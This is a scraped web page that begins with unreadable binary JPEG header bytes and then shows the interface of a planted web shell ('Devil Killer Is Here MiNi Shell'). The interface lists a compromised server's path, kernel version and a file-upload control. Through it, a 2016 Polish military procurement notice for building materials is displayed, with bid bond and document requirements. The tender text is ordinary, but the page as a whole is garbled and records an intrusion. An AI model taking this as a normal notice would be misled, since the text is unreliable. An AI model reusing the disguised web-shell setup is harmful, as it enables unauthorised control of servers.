JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160211/30196-N-2016.html

<p class="kh_header"><b>Wędrzyn: Dostawa z podziałem na dwie części:
Część nr 1 - materiałów branży budowlanej
Część  nr 2 - materiałów branży budowlanej - materiały sypkie</b><br>
<b>Numer ogłoszenia: 30196 - 2016; data zamieszczenia: 11.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 45 Wojskowy Oddział Gospodarczy , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www45wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa z podziałem na dwie części:
Część nr 1 - materiałów branży budowlanej
Część  nr 2 - materiałów branży budowlanej - materiały sypkie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
Część nr 1 - materiałów branży budowlanej,
Część  nr 2 - materiałów branży budowlanej - materiały sypkie.

1) Wyroby budowlane muszą posiadać certyfikaty ( deklaracje ) zgodnie z obowiązującymi normami lub aprobatę techniczną, posiadać oznaczenia CE zgodnie z ustawą o wyrobach budowlanych z dnia 16.04.2004 r. ( Dz. U. z 2004 r. Nr 92 poz. 881 z późniejszymi zmianami).
2) Na każdym opakowaniu w sposób trwały musi być naklejona etykieta.
3) Na etykiecie każdego opakowania mysi być podana nazwa materiału, nazwa producenta i data ważności w zakresie produktów chemicznych.
4) Data ważności musi wynosić minimum jeden rok od dnia dostarczenia do 45 Wojskowego Oddziału Gospodarczego  za wyjątkiem materiałów dla których producent określił termin ważności krótszy niż rok. W takim przypadku Zamawiający dopuszcza termin przydatności do użycia krótszy niż określony przez producenta o 14 dni.
5) Opakowania winny być fabrycznie zamknięte. Wykonawca zobowiązuje się dostarczyć materiały nowe, w pierwszej kategorii.
6) Wykonawca wraz z materiałami dostarczy nieodpłatnie dla Zamawiającego w wersji papierowej karty charakterystyki dla materiałów będącymi substancjami niebezpiecznymi bądź ich mieszaninami w myśl ustawy z dnia 25.02.2011  r. o substancjach chemicznych i ich mieszaninach ( Dz. U. z 2011 r. Nr 63 poz. 322 ). 
7) Wykonawca zobowiązuje się do oznakowania materiałów budowlanych kodem kreskowym tj. materiały należy oznakować kodem kreskowym zgodnie z decyzją nr 3-MON  Ministra Obrony Narodowej z dnia 03.01.2014r. w sprawie wytycznych określających wymagania w zakresie znakowanie kodem kreskowym wyrobów dostarczanych do resortu obrony narodowej. Dostarczone materiały powinny być oznakowane zgodnie z paragrafem 4 pkt 1 ppkt 4 i 5( grupa materiałowa 4 i 5) w/w decyzji. Zastosowane etykiety powinny spełniać wymagania określone w pkt  5 dla grupy materiałowej 4 i 5 odpowiednio w/w decyzji.
8) Wykonawca jest zobowiązany do przekazania  wypełnionej Karty wyrobu w postaci elektronicznej ( format MS EXEL) oraz papierowej do Zamawiającego przedmiotu zamówienia wskazanego w umowie, SIWZ zgodnie z załącznikiem nr 6 do w/w decyzji. Wykonawca przekaże Zamawiającemu wypełnioną kartę wyrobu najpóźniej w dniu dostawy.
Na potwierdzenie w/w warunku Wykonawca zobowiązany jest do złożenia stosownego 
oświadczenia wg wzoru stanowiącego Załącznik nr 8 do SIWZ.
9) Z obowiązku oznakowania kodem kreskowym zostają wyłączone materiały nabywane w ilościach mniejszych niż standardowe opakowanie fabryczne, jeżeli producent ( Dostawca, Wykonawca)  nie oznacza kodem kreskowym pojedynczego wyrobu  lecz nanosi go na opakowaniu np. elektroda, piasek, żwir.
10) Wykonawca zobowiązany jest do dołączenia do każdej dostawy, dokumentów określających jakość przedmiotu umowy tj. certyfikaty   jakości,  atesty PZH, deklaracje zgodności, aprobaty techniczne itp.;
11) Wykonawca zobowiązany jest do dołączenia do każdej dostawy na wszystkie substancje i  preparaty niebezpieczne  karty charakterystyki zgodnie  z ustawą   z dnia 25.02.2011r. ( Dz.U. z 2011r. nr 63 poz. 322).

Szczegółowy opis przedmiotu zamówienia zawierają Formularze cenowe, stanowiące Załącznik nr 2a i 2b do niniejszej specyfikacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.10.00.00-1, 03.40.00.00-4, 14.60.00.00-7, 44.80.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla poszczególnych części w wysokości:

- Część nr 1 -   5.000,00 zł (słownie: pięć tysięcy złotych 00-100);
- Część nr 2 -      250,00 zł (słownie: dwieście pięćdziesiąt złotych 00-100).

2. Wadium należy wnieść przed upływem terminu składania ofert. Wadium można wnieść w   
    jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824 z późn. zm.).
   Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
          NBP oddział w Zielonej Górze nr 28 1010 1704 0060 0213 9120 1000 z dopiskiem: 

Przetarg nieograniczony na  dostawę:
- Część nr 1 - materiałów branży budowlanej
- Część  nr 2 - materiałów branży budowlanej - materiały sypkie*

 	*niepotrzebne skreślić
Skuteczne wniesienie  wadium w pieniądzu następuje z chwilą wpływu środków
pieniężnych   na rachunek bankowy wskazany powyżej, przed upływem terminu
składania ofert.

Stosowny dowód potwierdzający wniesienie wadium należy załączyć do oferty.
Termin ważności wadium złożonego w innej formie niż pieniądz, powinien obejmować cały okres związania ofertą. W przypadku form innych niż pieniądz, musi być precyzyjnie określone: kto jest gwarantem, beneficjentem oraz zleceniodawcą gwarancji, wysokość kwoty gwarancji, termin ważności oraz zobowiązanie podmiotu udzielającego gwarancji do zapłaty wadium w przypadkach przewidzianych w art. 46 ustawy, mianowicie: Wykonawca, którego oferta została wybrana odmówi podpisania umowy na warunkach określonych w ofercie, nie wniesie zabezpieczenia należytego wykonania umowy, zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy, Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 cyt. ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
Również poręczenie musi precyzyjnie określać, za kogo poręczyciel dokonuje poręczenia, do jakiej wysokości i na jaki czas oraz wskazywać przedmiot poręczenia.
Z treści gwarancji lub poręczenia musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta (poręczyciela). Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikacją np. złożony wraz z imienną pieczątką lub czytelny  (z podaniem imienia i nazwiska). 
Gwarancja lub poręczenie powinno zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego - zgłoszone w terminie związania ofertą - wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji i art. 46 ust. 4 a i 5 ustawy - następuje jego bezwarunkowa wypłata, bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 

Dowodem wniesienia wadium w innej formie niż pieniądz jest załączenie do oferty kopii gwarancji lub poręczenia. 
Oryginał dokumentu (wadium w formie niepieniężnej) należy zdeponować w kancelarii jawnej (bud.33  II piętro, pok.211), wskazanej jako miejsce składania ofert w terminie tożsamym, z terminem składania ofert, tj. 18.02.2016r. do godz. 8.15.

W przypadku wniesienia odwołania po otwarciu ofert Zamawiający, nie później niż na 7 dni przed upływem ważności wadium, wzywa Wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie kieruje się jedynie do Wykonawcy, którego ofertę wybrano jako najkorzystniejszą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada uprawnienie do wykonywania 
określonej działalności lub czynności, jeżeli złoży oświadczenie, o którym mowa  w  art. 44 ustawy Pzp (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada niezbędną wiedzę i doświadczenie do   
            wykonywania zamówienia, jeżeli złoży oświadczenie, o którym mowa w art. 44
            ustawy Pzp (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada niezbędny potencjał techniczny jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp (zał. nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada  osoby zdolne  do   wykonywania zamówienia, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp (zał. nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca znajduje się w sytuacji ekonomicznej                
            i finansowej zapewniającej wykonanie zamówienia, jeżeli złoży oświadczenie, 
którym mowa w art. 44 ustawy Pzp (zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca składający ofertę do postępowania, ubiegający się o udzielenie
  zamówienia polegając na zasobach innych podmiotów na zasadach określonych 
 w art. 26 ust. 2b ustawy PZP- winien do oferty przedłożyć następujące  dokumenty podmiotu użyczającego zasoby:
1)	wypełniony załącznik nr 7 do SIWZ, tj.  Zobowiązanie do oddania do dyspozycji zasobów.
2)	oświadczenie o spełnianiu warunków określone w art. 44 ustawy Prawo zamówień publicznych- art. 22 ust.1 Pzp (wg wzoru zawartego w Załączniku nr 3 do SIWZ) oraz dokumentów określonych w SIWZ w Rozdziale VII pkt. 2 ppkt. od 1-4- podmiotu użyczającego.
Podmiot, który zobowiązał się do udostepnienia zasobów zgodnie z art. 26 ust. 2b ustawy PZP, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Zgodnie z art. 91. ust. 3a  ustawy Pzp Wykonawca, składając ofertę, informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.
W związku z powyższym Wykonawca zobowiązany jest do złożenia:
- Oświadczenia w zakresie obowiązku podatkowego u Zamawiającego, wg wzoru 
stanowiącego Załącznik nr 5 do SIWZ.
-wypełniony i podpisany Formularz ofertowy i cenowy z wykorzystaniem wzoru
zamieszczonego  w  niniejszej SIWZ - Załącznik nr 1 oraz  nr 2a, 2b  do SIWZ;
- Oświadczenie dotyczące obowiązku podatkowego - Załącznik nr 5 do SIWZ;
- Oświadczenie dotyczące oznakowania wyrobów kodami kreskowymi,  
       wg wzoru stanowiącego Załącznik nr 8 do SIWZ;
- Oświadczenie o przynależności do grupy kapitałowej w rozumieniu ustawy 
z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. z 2007r., 
nr 50, poz. 331 z późn. zm. w zakresie określonym w Załączniku nr  1 do SIWZ, 
tj. w Formularzu  ofertowym  pkt. 8. 
      Przy czym pod pojęciem:  
1)	Grupa kapitałowa - rozumie się przez to wszystkich przedsiębiorców, którzy są kontrolowani w sposób bezpośredni  lub pośredni przez jednego przedsiębiorcę, w tym również tego przedsiębiorcę (Ustawa z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. z 2007r., nr 50, poz. 331 z późn. zm., art. 4 pkt. 14)
2)	 Przedsiębiorca - rozumie się przez to przedsiębiorcę w rozumieniu przepisów o swobodzie działalności gospodarczej ( Ustawa z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. z 2007r., nr 50, poz. 331 z późn. zm., art. 4 pkt. 1)
3)	Przejęcie kontroli - rozumie się przez to wszelkie formy bezpośredniego lub pośredniego uzyskania przez przedsiębiorcę uprawnień, które osobno albo łącznie, przy uwzględnieniu wszystkich okoliczności prawnych lub faktycznych, umożliwiają wywieranie decydującego wpływu na innego przedsiębiorcę lub przedsiębiorców
( Ustawa z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U.                  z 2007r, nr 50, poz. 331 z późn. zm., art. 4 pkt. 4).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - termin realizacji - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.45wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 45 Wojskowy Oddział Gospodarczy w Wędrzynie, 69-211 Wędrzyn; bud. nr 33  pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2016 godzina 08:45, miejsce: 45 Wojskowy Oddział Gospodarczy w Wędrzynie, 69-211 Wędrzyn; bud. nr 33  Kancelaria Jawna - II - piętro pokój nr 211.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> materiałów branży budowlanej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia zawierają Formularze cenowe, stanowiące Załącznik nr 2a do niniejszej specyfikacji.
1) Wyroby budowlane muszą posiadać certyfikaty ( deklaracje ) zgodnie z obowiązującymi normami lub aprobatę techniczną, posiadać oznaczenia CE zgodnie z ustawą o wyrobach budowlanych z dnia 16.04.2004 r. ( Dz. U. z 2004 r. Nr 92 poz. 881 z późniejszymi zmianami).
2) Na każdym opakowaniu w sposób trwały musi być naklejona etykieta.
3) Na etykiecie każdego opakowania mysi być podana nazwa materiału, nazwa producenta i data ważności w zakresie produktów chemicznych.
4) Data ważności musi wynosić minimum jeden rok od dnia dostarczenia do 45 Wojskowego Oddziału Gospodarczego  za wyjątkiem materiałów dla których producent określił termin ważności krótszy niż rok. W takim przypadku Zamawiający dopuszcza termin przydatności do użycia krótszy niż określony przez producenta o 14 dni.
5) Opakowania winny być fabrycznie zamknięte. Wykonawca zobowiązuje się dostarczyć materiały nowe, w pierwszej kategorii.
6) Wykonawca wraz z materiałami dostarczy nieodpłatnie dla Zamawiającego w wersji papierowej karty charakterystyki dla materiałów będącymi substancjami niebezpiecznymi bądź ich mieszaninami w myśl ustawy z dnia 25.02.2011  r. o substancjach chemicznych i ich mieszaninach ( Dz. U. z 2011 r. Nr 63 poz. 322 ). 
